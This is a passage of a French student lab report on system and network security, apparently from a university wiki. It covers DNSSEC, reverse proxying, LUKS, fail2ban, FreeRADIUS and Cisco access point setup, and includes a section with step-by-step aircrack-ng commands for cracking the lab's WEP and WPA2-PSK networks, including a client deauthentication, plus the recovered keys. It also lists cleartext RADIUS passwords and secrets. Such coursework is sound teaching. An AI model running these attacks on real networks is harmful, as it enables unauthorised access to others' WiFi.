    &lt;br /&gt;
    # Utilisation de l'URL avec nom de domaine comme demandé&lt;br /&gt;
    ProxyPass / https://msalhi.online/&lt;br /&gt;
    ProxyPassReverse / https://msalhi.online/&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyVerify none&lt;br /&gt;
    SSLProxyCheckPeerCN off&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/proxy_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation des modules&lt;br /&gt;
a2enmod proxy proxy_http ssl&lt;br /&gt;
a2ensite msalhi-proxy.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-serveur-dns-par-dnssec&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de serveur DNS par DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-dnssec-automatique&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration DNSSEC automatique ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création du répertoire pour les clés&lt;br /&gt;
mkdir -p /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
# Ajout dans named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;dnspol&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Politique DNSSEC dans named.conf.options&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
dig @localhost msalhi.online DNSKEY +dnssec&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;résultat-des-clés-dnssec-générées&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Résultat des clés DNSSEC générées ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec&lt;br /&gt;
&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;enregistrement-de-la-ksk-chez-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Enregistrement de la KSK chez Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNSSEC chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Paramètre'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Algorithm&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 13 (ECDSAP256SHA256)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Flags&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 257 (KSK)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Public Key&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Effraction WiFi =&lt;br /&gt;
&lt;br /&gt;
== Cassage de clef WEP d’un point d’accès WiFi ==&lt;br /&gt;
Le réseau cible était &amp;lt;code&amp;gt;cracotte01&amp;lt;/code&amp;gt; (BSSID &amp;lt;code&amp;gt;04:DA:D2:9C:50:50&amp;lt;/code&amp;gt;, canal 4). La procédure a été réalisée depuis la machine &amp;lt;code&amp;gt;zabeth13&amp;lt;/code&amp;gt; avec les outils &amp;lt;code&amp;gt;aircrack-ng&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;ol&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Passage de la carte en mode monitor :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airmon-ng start wlan0&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Capture ciblée :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w capture_wep wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Authentification fake (association au point d’accès) :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -1 6000 -o 1 -q 10 -e cracotte01 -a 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Attaque ARP replay pour générer du trafic :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -3 -b 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Après accumulation d’environ 40 000 IVs, lancement de aircrack‑ng :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aircrack-ng capture_wep-01.cap&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
&lt;br /&gt;
La clé WEP a été trouvée en moins de 15 minutes : &amp;lt;code&amp;gt;FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
== Cassage de mot de passe WPA‑PSK par force brute ==&lt;br /&gt;
Le réseau &amp;lt;code&amp;gt;kracotte01&amp;lt;/code&amp;gt; (BSSID &amp;lt;code&amp;gt;44:AD:D9:5F:87:00&amp;lt;/code&amp;gt;, canal 13) utilisait WPA2‑PSK.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;ol&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Capture ciblée :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:00 -w wpa_capture wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Désauthentification d’un client (identifié &amp;lt;code&amp;gt;40:A5:EF:01:25:8B&amp;lt;/code&amp;gt;) pour forcer un handshake :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -0 10 -a 44:AD:D9:5F:87:00 -c 40:A5:EF:01:25:8B wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Après apparition du message '''“WPA handshake”''' dans &amp;lt;code&amp;gt;airodump‑ng&amp;lt;/code&amp;gt;, lancement de l’attaque par dictionnaire (mots de passe à 8 chiffres) :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;crunch 8 8 0123456789 | sudo aircrack-ng -b 44:AD:D9:5F:87:00 -w - wpa_capture-06.cap&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Résultat : le mot de passe &amp;lt;code&amp;gt;66689666&amp;lt;/code&amp;gt; a été découvert après environ 30 minutes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ces tests illustrent la vulnérabilité des protocoles WEP et des mots de passe courts face à des attaques par force brute.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
= Sécurisations =&lt;br /&gt;
&lt;br /&gt;
== Chiffrement de données ==&lt;br /&gt;
Sur Moon, une partition supplémentaire (disque virtuel &amp;lt;code&amp;gt;xvdb&amp;lt;/code&amp;gt;, correspondant au volume LVM &amp;lt;code&amp;gt;SE4.Moon.home&amp;lt;/code&amp;gt;) a été chiffrée avec LUKS.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Chiffrement de la partition&lt;br /&gt;
cryptsetup luksFormat /dev/xvdb&lt;br /&gt;
&lt;br /&gt;
# Ouverture du conteneur&lt;br /&gt;
cryptsetup open /dev/xvdb home_crypt&lt;br /&gt;
&lt;br /&gt;
# Création d’un système de fichiers&lt;br /&gt;
mkfs.ext4 /dev/mapper/home_crypt&lt;br /&gt;
&lt;br /&gt;
# Montage manuel&lt;br /&gt;
mount /dev/mapper/home_crypt /mnt/secret&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour automatiser le montage au démarrage, on ajoute dans &amp;lt;code&amp;gt;/etc/crypttab&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
home_crypt /dev/xvdb none luks&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
et dans &amp;lt;code&amp;gt;/etc/fstab&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/mapper/home_crypt /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le mot de passe doit être saisi manuellement à chaque démarrage, ce qui est acceptable pour un serveur de test.&lt;br /&gt;
&lt;br /&gt;
== Filtrage des services – fail2ban ==&lt;br /&gt;
Pour protéger SSH et les requêtes DNS malveillantes, &amp;lt;code&amp;gt;fail2ban&amp;lt;/code&amp;gt; a été installé sur Moon et Solstice.&lt;br /&gt;
&lt;br /&gt;
Fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[DEFAULT]&lt;br /&gt;
bantime = 3600&lt;br /&gt;
findtime = 600&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
logpath = /var/log/auth.log&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&lt;br /&gt;
[named-refused-tcp]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = domain,953&lt;br /&gt;
protocol = tcp&lt;br /&gt;
filter = named-refused&lt;br /&gt;
logpath = /var/log/named/security.log&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Filtre &amp;lt;code&amp;gt;/etc/fail2ban/filter.d/named-refused.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[Definition]&lt;br /&gt;
failregex = ^\S+ named\[\d+\]: client &amp;lt;HOST&amp;gt;#\S+ .* query .* denied&lt;br /&gt;
ignoreregex =&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le service est démarré et activé :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
systemctl enable fail2ban&lt;br /&gt;
systemctl restart fail2ban&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation WiFi par WPA2‑EAP ==&lt;br /&gt;
&lt;br /&gt;
=== Serveur FreeRADIUS sur Moon ===&lt;br /&gt;
Installation :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt install freeradius freeradius-utils -y&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ajout du client (point d’accès) dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client vlan1_ap1 {&lt;br /&gt;
    ipaddr = 172.27.0.4    # VLAN 1 management&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap1-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
client vlan1_ap2 {&lt;br /&gt;
    ipaddr = 172.27.0.3    # VLAN 1 management&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap2-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création d’un utilisateur dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;quot;msalhi&amp;quot; Cleartext-Password := &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
    &lt;br /&gt;
&amp;quot;etudiant1&amp;quot; Cleartext-Password := &amp;quot;Password123&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;quot;prof&amp;quot; Cleartext-Password := &amp;quot;AdminSE4!&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration EAP pour PEAP‑MSCHAPv2 dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enabled/eap&amp;lt;/code&amp;gt; (type par défaut &amp;lt;code&amp;gt;peap&amp;lt;/code&amp;gt;, tunnel intérieur &amp;lt;code&amp;gt;mschapv2&amp;lt;/code&amp;gt;).  &lt;br /&gt;
Un conflit de port (18120) a été résolu en commentant la section &amp;lt;code&amp;gt;listen&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/sites-enabled/inner-tunnel&amp;lt;/code&amp;gt; (ou en mettant &amp;lt;code&amp;gt;port = 0&amp;lt;/code&amp;gt;).&lt;br /&gt;
&lt;br /&gt;
Test local :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
radtest msalhi WifiSecure2026! localhost 0 testing123&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76&lt;br /&gt;
	User-Name = &amp;quot;msalhi&amp;quot;&lt;br /&gt;
	User-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
	NAS-IP-Address = 127.0.0.1&lt;br /&gt;
	NAS-Port = 0&lt;br /&gt;
	Message-Authenticator = 0x00&lt;br /&gt;
	Cleartext-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
→ réponse &amp;lt;code&amp;gt;Access-Accept&amp;lt;/code&amp;gt; attendue.&lt;br /&gt;
&lt;br /&gt;
=== Configuration du point d’accès WiFi ===&lt;br /&gt;
Sur le point d’accès (wifi‑E304), les lignes suivantes ont été ajoutées (en conservant les configurations des autres étudiants) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
aaa group server radius radius_student25&lt;br /&gt;
 server 192.168.20.2 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
aaa authentication login eap_student25 group radius_student25&lt;br /&gt;
&lt;br /&gt;
dot11 ssid VM_SERVICES_15&lt;br /&gt;
 vlan 25&lt;br /&gt;
 authentication open eap eap_student25&lt;br /&gt;
 authentication network-eap eap_student25&lt;br /&gt;
 authentication key-management wpa version 2&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
 encryption vlan 25 mode ciphers aes-ccm&lt;br /&gt;
 ssid VM_SERVICES_15&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.25&lt;br /&gt;
 encapsulation dot1Q 25&lt;br /&gt;
 bridge-group 25&lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.25&lt;br /&gt;
 encapsulation dot1Q 25&lt;br /&gt;
 bridge-group 25&lt;br /&gt;
&lt;br /&gt;
radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key radius_secret_salhi_2026&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Configuration DHCP sur les routeurs ===&lt;br /&gt;
Sur '''E304''' (plage 100‑150) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 10.60.15.1 10.60.15.99&lt;br /&gt;
ip dhcp excluded-address 10.60.15.151 10.60.15.254&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool SALHI_VLAN25&lt;br /&gt;
 network 10.60.15.0 255.255.255.0&lt;br /&gt;
 default-router 10.60.15.1&lt;br /&gt;
 dns-server 192.168.20.2 8.8.8.8&lt;br /&gt;
 domain-name msalhi.online&lt;br /&gt;
 lease 0 12&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Policy‑Based Routing (PBR) ===&lt;br /&gt;
Pour que le trafic IPv4 du VLAN 25 passe par Solstice (où il sera NATé vers Internet), on a configuré sur E304 :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
ip access-list extended TRAFIC_VLAN25&lt;br /&gt;
 permit ip 10.60.15.0 0.0.0.255 any&lt;br /&gt;
!&lt;br /&gt;
route-map PBR_VLAN25 permit 10&lt;br /&gt;
 match ip address TRAFIC_VLAN25&lt;br /&gt;
 set ip next-hop 193.48.57.167&lt;br /&gt;
!&lt;br /&gt;
interface Vlan25&lt;br /&gt;
 ip policy route-map PBR_VLAN25&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette politique force tout le trafic IPv4 du VLAN 25 vers Solstice. La mascarade a ensuite été élargie sur Solstice pour inclure ce réseau :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 10.60.15.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Tests ===&lt;br /&gt;
Un client connecté au SSID &amp;lt;code&amp;gt;VM_SERVICES_15&amp;lt;/code&amp;gt; obtient une adresse IP dans la plage DHCP (ex. &amp;lt;code&amp;gt;10.60.15.101&amp;lt;/code&amp;gt;), peut résoudre des noms DNS (via Moon) et accéder à Internet. Le traceroute montre le passage par Solstice (&amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;).&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12475</id>
		<title>Atelier SysRes SE4 2025/2026 E15</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12475"/>
		<updated>2026-02-27T12:09:30Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Configuration DHCP sur les routeurs */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&amp;lt;div class=&amp;quot;titlepage&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Rapport de Projet SE4 IdO&amp;lt;br /&amp;gt;&lt;br /&gt;
Sécurité Système/Réseau'''&lt;br /&gt;
&lt;br /&gt;
'''Année Universitaire 2025-2026'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div class=&amp;quot;figure&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:polytech_logo.png|image]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
'''Étudiant: Mohamed SALHI'''&lt;br /&gt;
&lt;br /&gt;
'''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''&lt;br /&gt;
&lt;br /&gt;
'''Domaine: &amp;lt;code&amp;gt;msalhi.online&amp;lt;/code&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
'''École Polytechnique Universitaire de Lille'''&lt;br /&gt;
&lt;br /&gt;
2026-02-02&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;introduction&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.&lt;br /&gt;
&lt;br /&gt;
L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :&lt;br /&gt;
&lt;br /&gt;
* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs&lt;br /&gt;
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse&lt;br /&gt;
* Une infrastructure réseau redondante avec routeurs Cisco C9200&lt;br /&gt;
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;atelier-système-et-réseau---machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Atelier système et réseau - Machines virtuelles =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;création-des-machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Création des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 &amp;lt;code&amp;gt;capbreton.plil.info&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;commandes-de-création&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Commandes de création ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création de la machine de services SE4.Moon&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
# Création de la machine mandataire SE4.Solstice&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;démarrage-et-connexion&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Démarrage et connexion ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Démarrage des VMs&lt;br /&gt;
xen create /etc/xen/SE4.Moon.cfg&lt;br /&gt;
xen create /etc/xen/SE4.Solstice.cfg&lt;br /&gt;
&lt;br /&gt;
# Connexion aux consoles&lt;br /&gt;
xen console SE4.Moon&lt;br /&gt;
xen console SE4.Solstice&lt;br /&gt;
&lt;br /&gt;
# Liste des VMs actives&lt;br /&gt;
root@capbreton:~# xen list&lt;br /&gt;
Name                                        ID   Mem VCPUs    State   Time(s)&lt;br /&gt;
SE4.Solstice                                39  2048     1     -b----    2560.1&lt;br /&gt;
SE4.Moon                                   119  2048     1     -b----     452.3&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-de-services-se4.moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine de services (SE4.Moon) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;montage-des-partitions-lvm-pour-var-et-home&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Montage des partitions LVM pour /var et /home ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création des fichiers de partition sur le Dom0&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual&lt;br /&gt;
&lt;br /&gt;
# Modification du fichier de configuration Xen&lt;br /&gt;
disk = [&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.home,xvdb,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.var,xvdc,w',&lt;br /&gt;
]&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;formatage-et-montage-des-partitions&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Formatage et montage des partitions ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Formatage des partitions&lt;br /&gt;
mkfs -t ext4 /dev/xvdb&lt;br /&gt;
mkfs -t ext4 /dev/xvdc&lt;br /&gt;
&lt;br /&gt;
# Montage temporaire et copie des données&lt;br /&gt;
mount /dev/xvdc /mnt&lt;br /&gt;
mv /var/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
mount /dev/xvdb /mnt&lt;br /&gt;
mv /home/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
# Configuration du fstab&lt;br /&gt;
cat &amp;gt; /etc/fstab &amp;lt;&amp;lt; EOF&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvdb /home ext4 defaults 0 2&lt;br /&gt;
/dev/xvdc /var ext4 defaults 0 2&lt;br /&gt;
EOF&lt;br /&gt;
&lt;br /&gt;
# Application des modifications&lt;br /&gt;
mount -a&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
